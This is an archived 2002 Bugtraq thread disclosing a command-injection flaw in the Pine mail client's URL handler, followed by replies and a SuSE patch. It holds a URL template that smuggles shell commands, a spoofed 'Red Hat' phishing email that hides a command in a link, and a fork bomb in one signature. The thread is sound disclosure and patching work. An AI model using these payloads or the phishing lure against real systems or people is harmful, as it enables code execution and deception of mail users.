7752291 2002-01-05 15:17 +1300 /140 rader/ zen-parse <zen-parse@gmx.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-06 02:16 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20374>
Ärende: Pine 4.33 (at least) URL handler allows embedded commands.
------------------------------------------------------------
From: zen-parse <zen-parse@gmx.net>
To: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0201051514170.25654-100000@clarity.local>
Systems: Pine 4.33 (under Redhat 7.0)
(Probably many others, haven't checked much)
Vendors notified: Sat, 20 Oct 2001 06:50:12 +1300 (NZDT)
And again: Fri, 9 Nov 2001 07:14:15 +1300 (NZDT)
And again: Thu, 3 Jan 2002 08:15:55 +1300 (NZDT)
Problem: URL handler allows embedded commands.
May allow email viruses of the Outlook kind.
Severity: Extremely Low -> Very High (Dependant on current
email reading habits)
Workaround: Don't view URLs from inside Pine.
(ObSpam: Except for http://mp3.com/cosv/ ;])
Details:
This is a similar problem to the xchat 1.4.1 URL handler
vulnerability. http://www.securityfocus.com/bid/1601
In Pine, if a user selects a URL for the form
http://address/'&/some/program${IFS}with${IFS}arguments&'
and URL handlers are installed, they will end up with the browser
open on
http://address/
and
/some/program with arguments
will get executed.
If you are reading your email as root these these commands will
execute as root. (Create an alias for root to a non-privileged user
instead of reading mail as root.)
If you are reading your email as a non-privileged user, the impact
is somewhat lower, although local exploits could be run on the
computer, or Outlook style email viruses could be executed.
If you don't view links given to you in Pine, the impact from this
problem is non-existant.
It is possible to obfuscate the URL by putting it in an HTML message
such as the following.
----Begin html email----
From: Redhat Network Security <rhnsecurity@redhat.com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Message-ID: <Pine.LNX.4.33.0110221213510.9618-200000@clarity.local>
MIME-Version: 1.0
Content-Type: TEXT/html
Content-ID: <Pine.LNX.4.33.0110221214120.9618@clarity.local>
Content-Length: 389
Lines: 12
<HTML>
<BODY>
Urgent update:<p>
PINE allows execution of arbitrary commands.<p>
<a href="http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/';touch${IFS}/tmp/zen.was.here;'/">
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/hole-in-pine-url-handler/</a>
<p>
This link contains PINE update information. <p>
You are advised to perform this immediately. <p>
The link also contains other urgent update information. <p>
</BODY>
</HTML>
----End html email----
Which would appear something like
----Begin view of email----
Date: Mon, 22 Oct 2001 13:34:40 +1300
From: Redhat Network Security <rhnsecurity@redhat.com>
To: undisclosed list <.@.>
Subject: Urgent update required to PINE
Urgent update:
PINE allows execution of arbitrary commands.
http://updates.redhat.com/update_information/urgent/redhat-linux-version-7.0/ho
e-in-pine-url-handler/
This link contains PINE update information.
You are advised to perform this immediately.
The link also contains other urgent update information.
----End view of email----
When this link is selected to follow, Pine changes the status/menu
lines to read:
View selected URL "http://updates.redhat.com/update_information/urgent/r..." ?
Y [Yes] U editURL
N No A editApp
Which appears to match the url in the email. This probably makes
detection of this kind of exploit attempt harder.
-- zen-parse
[ A (relatively) safe way to visit http://mp3.com/cosv is to type the
address into the address bar of the browser you are using. Contrary to a
rumour posted several days ago, the only way I get any money from this
site is through CD purchases. If you want to, visit the site and listen
to the music. If you like it, you might want to buy it, or not. I hope
nobody has any illusion of being tricked into visiting. ]
--
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parse@gmx.net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.
(7752291) /zen-parse <zen-parse@gmx.net>/-(Ombruten)
Kommentar i text 7756253 av Michal Zalewski <lcamtuf@coredump.cx>
7756253 2002-01-06 17:37 -0500 /24 rader/ Michal Zalewski <lcamtuf@coredump.cx>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-07 10:33 av Brevbäraren
Extern mottagare: zen-parse <zen-parse@gmx.net>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20396>
Kommentar till text 7752291 av zen-parse <zen-parse@gmx.net>
Ärende: Re: Pine 4.33 (at least) URL handler allows embedded commands.
------------------------------------------------------------
From: Michal Zalewski <lcamtuf@coredump.cx>
To: zen-parse <zen-parse@gmx.net>
Cc: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.42.0201061733250.3881-100000@nimue.bos.bindview.com>
On Sat, 5 Jan 2002, zen-parse wrote:
> Problem: URL handler allows embedded commands.
> May allow email viruses of the Outlook kind.
> http://address/'&/some/program${IFS}with${IFS}arguments&'
Isn't that old news? http://www.securityfocus.com/bid/810
I *can* be wrong, but it looks like it is the same problem...
--
_____________________________________________________
Michal Zalewski [lcamtuf@bos.bindview.com] [security]
[http://lcamtuf.coredump.cx] <=-=> bash$ :(){ :|:&};:
=-=> Did you know that clones never use mirrors? <=-=
http://lcamtuf.coredump.cx/photo/
(7756253) /Michal Zalewski <lcamtuf@coredump.cx>/---
7765311 2002-01-07 21:05 +1300 /56 rader/ zen-parse <zen-parse@gmx.net>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-08 16:55 av Brevbäraren
Extern mottagare: Michal Zalewski <lcamtuf@coredump.cx>
Extern kopiemottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20416>
Kommentar till text 7756253 av Michal Zalewski <lcamtuf@coredump.cx>
Ärende: Re: Pine 4.33 (at least) URL handler allows embedded commands.
------------------------------------------------------------
From: zen-parse <zen-parse@gmx.net>
To: Michal Zalewski <lcamtuf@coredump.cx>
Cc: <bugtraq@securityfocus.com>
Message-ID: <Pine.LNX.4.33.0201072017180.2834-100000@clarity.local>
On Sun, 6 Jan 2002, Michal Zalewski wrote:
> On Sat, 5 Jan 2002, zen-parse wrote:
>
> > Problem: URL handler allows embedded commands.
> > May allow email viruses of the Outlook kind.
>
> > http://address/'&/some/program${IFS}with${IFS}arguments&'
>
> Isn't that old news? http://www.securityfocus.com/bid/810
>
> I *can* be wrong, but it looks like it is the same problem...
Not quite, but it seems to be a related problem (ie caused by the
shell parsing what it was given).
There is some checking for metacharacters done, and if it has any, it
puts a single quote around them. However it doesn't check for
another single quote.
And then, on Sun, 6 Jan 2002, Michal Zalewski wrote:
> > Isn't that old news? http://www.securityfocus.com/bid/810 I *can* be
> > wrong, but it looks like it is the same problem...
>
> Ah ok, it is not extactly the same... they "fixed" it... still, I'm pretty
> sure I've seen it (things like '`id`') later, in 2000 or 2001 on
> BUGTRAQ...
What might work as a solution could be changing all "'"s into "'\''"s
as it does in another part of the code.
Or maybe use a popen that doesn't call a shell.
Could've been the X-Chat thing you saw, but I wouldn't be too
surprised if there were more things like that in various clients
that come with URL handlers.
-- zen-parse
--
-------------------------------------------------------------------------
The preceding information is confidential and may not be redistributed
without explicit permission. Legal action may be taken to enforce this.
If this message was posted by zen-parse@gmx.net to a public forum it may
be redistributed as long as these conditions remain attached. If you are
mum or dad, this probably doesn't apply to you.
(7765311) /zen-parse <zen-parse@gmx.net>/-(Ombruten)
7765396 2002-01-07 14:01 +0100 /26 rader/ Roman Drahtmueller <draht@suse.de>
Sänt av: joel@lysator.liu.se
Importerad: 2002-01-08 17:08 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20418>
Kommentar till text 7756253 av Michal Zalewski <lcamtuf@coredump.cx>
Ärende: Re: Pine 4.33 (at least) URL handler allows embedded commands.
------------------------------------------------------------
From: Roman Drahtmueller <draht@suse.de>
To: bugtraq@securityfocus.com
Message-ID: <Pine.LNX.4.43.0201071358190.22932-200000@dent.suse.de>
> > Problem: URL handler allows embedded commands.
> > May allow email viruses of the Outlook kind.
>
> > http://address/'&/some/program${IFS}with${IFS}arguments&'
>
> Isn't that old news? http://www.securityfocus.com/bid/810
>
> I *can* be wrong, but it looks like it is the same problem...
SuSE pine packages contain a patch that makes pine use environment
variables to pass on the URL to the viewer. The patch is attached -
I'm not sure who made it, but it looks like from Olaf Kirch.
Roman.
--
- -
| Roman Drahtmüller <draht@suse.de> // "You don't need eyes to see, |
SuSE GmbH - Security Phone: // you need vision!"
| Nürnberg, Germany +49-911-740530 // Maxi Jazz, Faithless |
- -
(7765396) /Roman Drahtmueller <draht@suse.de>/(Ombruten)
Bilaga (text/plain) i text 7765397
7765397 2002-01-07 14:01 +0100 /151 rader/ Roman Drahtmueller <draht@suse.de>
Bilagans filnamn: "pine-4.33-security.patch"
Importerad: 2002-01-08 17:08 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <20419>
Bilaga (text/plain) till text 7765396
Ärende: Bilaga (pine-4.33-security.patch) till: Re: Pine 4.33 (at least) URL handler allows embedded commands.
------------------------------------------------------------
--- pine/mailview.c.orig Thu Oct 12 21:33:32 2000
+++ pine/mailview.c Fri Oct 27 10:04:58 2000
@@ -3738,124 +3738,46 @@
#define URL_MAX_LAUNCH (2 * MAILTMPLEN)
if(handle->h.url.tool){
- char *toolp, *cmdp, *p, *q, cmd[URL_MAX_LAUNCH + 1];
- char *left_double_quote, *right_double_quote;
- int mode, len, hlen, quotable = 0, copied = 0, double_quoted = 0;
+ char *toolp, *cmdp, *endp, cmd[URL_MAX_LAUNCH + 1];
+ int mode, len, copied = 0;
PIPE_S *syspipe;
if((len = strlen(toolp = handle->h.url.tool)) > URL_MAX_LAUNCH)
return(url_launch_too_long(rv));
- hlen = strlen(handle->h.url.path);
-
/*
- * Figure out if we need to quote the URL. If there are shell
- * metacharacters in it we want to quote it, because we don't want
- * the shell to interpret them. However, if the user has already
- * quoted the URL in the command definition we don't want to quote
- * again. So, we try to see if there are a pair of unescaped
- * quotes surrounding _URL_ in the cmd.
- * If we quote when we shouldn't have, it'll cause it not to work.
- * If we don't quote when we should have, it's a possible security
- * problem (and it still won't work).
- *
- * In bash and ksh $( executes a command, so we use single quotes
- * instead of double quotes to do our quoting. If configured command
- * is double-quoted we change that to single quotes.
+ * Rather than trying to be smart about quoting and
+ * meta-characters, just stuff the URL into an environment
+ * variable and make the handler use it.
*/
-#ifdef _WINDOWS
- if(*toolp == '*' || (*toolp == '\"' && *(toolp+1) == '*'))
- quotable = 0; /* never quote */
- else
-#endif
- if(strpbrk(handle->h.url.path, "&*;<>?[|~$") != NULL){ /* specials? */
- if((p = strstr(toolp, "_URL_")) != NULL){ /* explicit arg? */
- int in_quote = 0;
-
- /* see whether or not it is already quoted */
-
- quotable = 1;
-
- for(q = toolp; q < p; q++)
- if(*q == '\'' && (q == toolp || q[-1] != '\\'))
- in_quote = 1 - in_quote;
-
- if(in_quote){
- for(q = p+5; *q; q++)
- if(*q == '\'' && q[-1] != '\\'){
- /* already single quoted, leave it alone */
- quotable = 0;
- break;
- }
- }
-
- if(quotable){
- in_quote = 0;
- for(q = toolp; q < p; q++)
- if(*q == '\"' && (q == toolp || q[-1] != '\\')){
- in_quote = 1 - in_quote;
- if(in_quote)
- left_double_quote = q;
- }
-
- if(in_quote){
- for(q = p+5; *q; q++)
- if(*q == '\"' && q[-1] != '\\'){
- /* we'll replace double quotes with singles */
- double_quoted = 1;
- right_double_quote = q;
- break;
- }
- }
- }
- }
- else
- quotable = 1;
- }
- else
- quotable = 0;
+ setenv("URL", handle->h.url.path, 1);
+#define _URL_EXPANSION "\"$URL\""
/* Build the command */
cmdp = cmd;
- while(1)
- if((!*toolp && !copied)
- || (*toolp == '_' && !strncmp(toolp + 1, "URL_", 4))){
+ endp = cmd + sizeof(cmd) - 1;
+ do {
+ if (cmdp + 1 > endp)
+ return(url_launch_too_long(rv));
+ if (!*toolp && !copied) {
/* implicit _URL_ at end */
- if(!*toolp){
- *cmdp++ = ' ';
- len++;
- }
-
- /* add single quotes */
- if(quotable && !double_quoted){
- *cmdp++ = '\'';
- len += 2;
- }
+ *endp++ = ' ';
+ toolp = "_URL_";
+ }
+
+ if (strncmp(toolp, "_URL_", 5) != 0) {
+ *cmdp++ = *toolp++;
+ } else {
+ toolp += 5; /* length of _URL_ */
- if((len += hlen) > URL_MAX_LAUNCH)
+ if (cmdp + sizeof(_URL_EXPANSION) - 1 > endp)
return(url_launch_too_long(rv));
+ sstrcpy(&cmdp, _URL_EXPANSION);
copied = 1;
- sstrcpy(&cmdp, handle->h.url.path);
- if(quotable && !double_quoted){
- *cmdp++ = '\'';
- *cmdp = '\0';
- }
-
- if(*toolp)
- toolp += 5; /* length of "_URL_" */
- }
- else{
- /* replace double quotes with single quotes */
- if(double_quoted &&
- (toolp == left_double_quote || toolp == right_double_quote)){
- *cmdp++ = '\'';
- toolp++;
- }
- else if(!(*cmdp++ = *toolp++))
- break;
}
+ } while (*toolp);
mode = PIPE_RESET | PIPE_USER ;
if(syspipe = open_system_pipe(cmd, NULL, NULL, mode, 0)){
(7765397) /Roman Drahtmueller <draht@suse.de>/------